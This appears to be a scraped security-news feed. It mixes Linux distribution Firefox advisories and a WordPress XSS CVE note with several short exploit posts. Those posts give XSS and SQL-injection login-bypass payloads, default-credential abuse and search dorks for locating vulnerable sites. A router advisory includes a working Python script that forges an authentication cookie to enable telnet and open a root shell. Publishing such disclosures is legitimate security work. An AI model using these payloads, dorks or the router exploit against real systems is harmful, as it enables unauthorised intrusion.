The Metform Elementor Contact Form Builder for WordPress is vulnerable to Cross-Site Scripting by using the 'mf_first_name' shortcode to echo unescaped form submissions in versions up to, and including, 3.3.0. This allows authenticated attackers, with contributor-level permissions or above, to inject arbitrary web scripts in pages that will execute when the victim visits a a page containing the shortcode when the submission id is present in the query string. Note that getting the JavaScript to execute requires user interaction as the victim must visit a crafted link with the form entry id, but the script itself is stored in the site database.

CVE-2023-0708: Changeset 2907471 – WordPress Plugin Repository

Debian Linux Security Advisory 5421-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5421-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 07, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2023-34414 CVE-2023-34416Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode.For the stable distribution (bullseye), these problems have been fixed inversion 102.12.0esr-1~deb11u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSA8KsACgkQEMKTtsN8TjYSqBAAqZeT5wOx739rLds++dr7nw2AsHTokRdcQskPewJwqSOYY8ErKQbY5Crfre/0OXsuaq/gy0Y2+7LeAManTLl4uOzVz2wBEjWFYQ4ptLG543PzPWpbwFTlcx3HVdmtAMUrg65/eEk+m/wMFCfU3ydL3SSuT1EMjRMXGm39y2ocT3JK+CAME0ajxyHkFIbz+UjvUXnpbXTeA++O0Caexic5ACAi3GPtmFSJI1vtwI9nCCNQnQMbIWdaQ8ANOm1U1FT5Wli71M2YE8LVGIaGsavKR62DRa0Hr6omHGbmsXNRCclM6lrx7vaAt274IOghNCXYQzSd58nHw6TlshcKn7ScMpNmwYhmsSYbquk57pSNLxVU2cJEQo8V6QqoskbhnkiY0rSBKWWBzB5HiUABgYD3HHGedDJF3jhNQQNV8O0FhZq2NCCC3BDw/VdeRz2fF2LeQwc4XMP6rmJSNkc2PFETT0cKRVS4EpLJMth6lk8HVQfTeBZe0hqI8W7fwQ/T4LJa55KOFEct6p5eNG7aq5he3zOWH0BA2WwuvDA/y8M7hIUxifP92RhsevIMQDrwaMGwRb6ejme1ChHUrax+hGtBqR1ti6fNoT1jRqmJs+15JKMLQwArrWivLVNhnfMh3Tb9UEE/VdV6dKmenuCFBx5wJIMRT83wSuCIcYVtaznfZ88==wKyc-----END PGP SIGNATURE-----

Debian Security Advisory 5421-1

MVC Shop version 0.5 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : mvc-shop v0.5 XSS Vulnerability                                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://github.com/tanhongit/new-mvc-shop/releases/tag/v0.5                                                        || # Dork      :                                                                                                                    |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  Register a new membership and enter the membership control panel and choose to modify the member's profile and in the name field put any payload that suits you and then save the changes[+]  Use Payload : <script>alert(/indoushka/);</script>[+]  http://127.0.0.1/chikoiquan.tanhongitcom/        == Greetings to :===========================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |        ============================================================================================

MVC Shop 0.5 Cross Site Scripting

NETXPERTS CMS version 0.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : NETXPERTS-CMS v0.1 Auth By Pass Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : http://netxperts.in/                                                                                               |  | # Dork      : "Designed by NETXPERTS"                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user : 1'or'1'='1 & Pass : 1'or'1'='1[+] https://127.0.0.1/sivasudartravels/admin/production.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

NETXPERTS CMS 0.1 SQL Injection

Anuranan SBAdmin version 2 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : Anuranan SBAdmin 2 Insecure Settings Vulnerability                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 113.0.1 (64 bits)                                          | | # Vendor    : https://anuranangroup.com/                                                                                         |  | # Dork      : Created by: Anuranan Group                                                                                         |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user&pass= admin [+] https://127.0.0.1/hpgreenlandresort.com/admin/login.aspxGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Anuranan SBAdmin 2 Insecure Settings

Ubuntu Security Notice 6143-1 - Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. Jun Kokatsu discovered that Firefox did not properly validate site-isolated process for a document loaded from a data: URL that was the result of a redirect, leading to an open redirect attack. An attacker could possibly use this issue to perform phishing attacks.

    =========================================================================Ubuntu Security Notice USN-6143-1June 07, 2023firefox vulnerabilities=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Firefox.Software Description:- firefox: Mozilla Open Source web browserDetails:Multiple security issues were discovered in Firefox. If a user weretricked into opening a specially crafted website, an attacker couldpotentially exploit these to cause a denial of service, obtain sensitiveinformation across domains, or execute arbitrary code. (CVE-2023-34414,CVE-2023-34416, CVE-2023-34417)Jun Kokatsu discovered that Firefox did not properly validate site-isolatedprocess for a document loaded from a data: URL that was the result of aredirect, leading to an open redirect attack. An attacker could possiblyuse this issue to perform phishing attacks. (CVE-2023-34415)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  firefox                         114.0+build3-0ubuntu0.20.04.1After a standard system update you need to restart Firefox to make all thenecessary changes.References:  https://ubuntu.com/security/notices/USN-6143-1  CVE-2023-34414, CVE-2023-34415, CVE-2023-34416, CVE-2023-34417Package Information:  https://launchpad.net/ubuntu/+source/firefox/114.0+build3-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6143-1

Whitepaper called Bughunter's Life-Style: A DIY guide to become an alone long time bughunter for ordinary people. Written in Spanish.

A DIY Guide To Become An Alone Long Time Bughunter For Ordinary People

Magento eCommerce version 2.4.0 suffers from an information disclosure vulnerability.

    ====================================================================================================================================| # Title     : Magento eCommerce v 2.4.0 sensitive information disclosure Vulnerability                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              | | # Vendor    : https://devdocs.magento.com/                                                                                       |  | # Dork      : Index of /var/log/                                                                                                 |====================================================================================================================================poc : [+]  Keeping records in an unprotected folder, The logs contain sensitive information such as folder path,etc...[+]  Dorking İn Google Or Other Search Enggine .[+]  http://127.0.0.1/dawnfrozenfoods.com/var/log/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

Magento eCommerce 2.4.0 Information Disclosure

Wizcyb Interactive version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : wizcyb interactive v2.0 auth by pass Vulnerability                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : https://www.wizcyb.com/products.php                                                                                |  | # Dork      : powered by wizcyb interactive                                                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=1' or 1=1 -- - & pass=1' or 1=1 -- - [+] https://127.0.0.1/www/jobcapsindiacom/admin/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Wizcyb Interactive 2.0 SQL Injection

An issue in Planet Technologies WDRT-1800AX v1.01-CP21 allows attackers to bypass authentication and escalate privileges to root via manipulation of the LoginStatus cookie.

**Planet Technologies WDRT-1800AX Authentication Bypass Vulnerability .**

Affected Device: WDRT-1800AX

Affected Firmware: v1.01-CP21

Description:

    The PLANET technologies 1800AX router runs a web service vulnerable to trivial authentication bypass.
    The bypass can be combined with a telnet weakness leading to a root shell on the device. 
    The router runs a minimal lighttpd binary to support a collection of JavaScript and html files which create requests to a 'cdata.cgi' binary.
    This 32bit MIPS compiled binary supports the core functionality of the web service however uses a standard cookie to determine authenticated status. 
    

**Details**

The WDRT-1800AX router from PLANET technologies uses a pre-set, boolean cookie for determining authentication to the web management pages. The cookie 'LoginStatus' is created when a user attempts to login to the login form hosted by a CGI binary running via Lighttpd.

By simply replacing false to true, a user can bypass the need to supply the password to the web form, and instead access all administration functions of the device, including but not limited to; password resets, configuration downloads and enabling telnet.

Due to the router in its default configuration not having a password for the root user, when a user attempts to login to the telnet service as root, it simply supplies a session.

With a basic proof of concept, any lan-adjacent attacker can gain root access to the device without needing the appropriate passwords to the service(s). An example can be found below to enable the telnet service and interact with it.

import requests, telnetlib, sys
host \= sys.argv\[1\]
url \= 'http://'+host+'/cgi-bin/cdata.cgi'

cookies \= {'LoginStatus':'true'}

headers \= {
   'User-Agent': 'Mozilla/5.0 (X11; Linux x86\_64; rv:102.0) Gecko/20100101 Firefox/102.0',
   'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
}
\# doesnt check if its already enabled, just tries to enable it. 
data \= {
   'operation': 'DevManagement',
   'opt': 'telnet',
   'telnet': '1',
}

user \= "root"
print("enabling telnet")

req \= requests.post(url, headers\=headers,data\=data)

if req.text != '{ "err": 0 }':
   print("failed")

tn \= telnetlib.Telnet(host, 23)
if (tn):
   print("connecting to session")
   tn.read\_until(b"login: ")
   tn.write(user.encode('ascii') + b"\\n")
   tn.interact()

**Disclosure**

13/2/23 - Issue identified, pocs created and reported via support page  
13/2/23 - Vendor reply asking for further information  
13/2/23 - Send python proof of concepts and expanded the explaination  
15/2/23 - Vendor reply confirming the behavior, estimating a fixed release in Q2 2023.  
07/04/23 - Vendor pushed updated firmware  
05/05/23 - Advisory released  

**Extra notes**

When I was first looking into the web app running in QEMU, I figured that the option to change the language to English was broken since the management option was set but not rendering. This was until I realised that the English language JavaScript file wasn't ever being included in the pre-set html pages, renaming the lang_en.js to lang_zh.js and clearing browser cache allowed the page to render without having to translate everything manually. :)

Tag

#firefox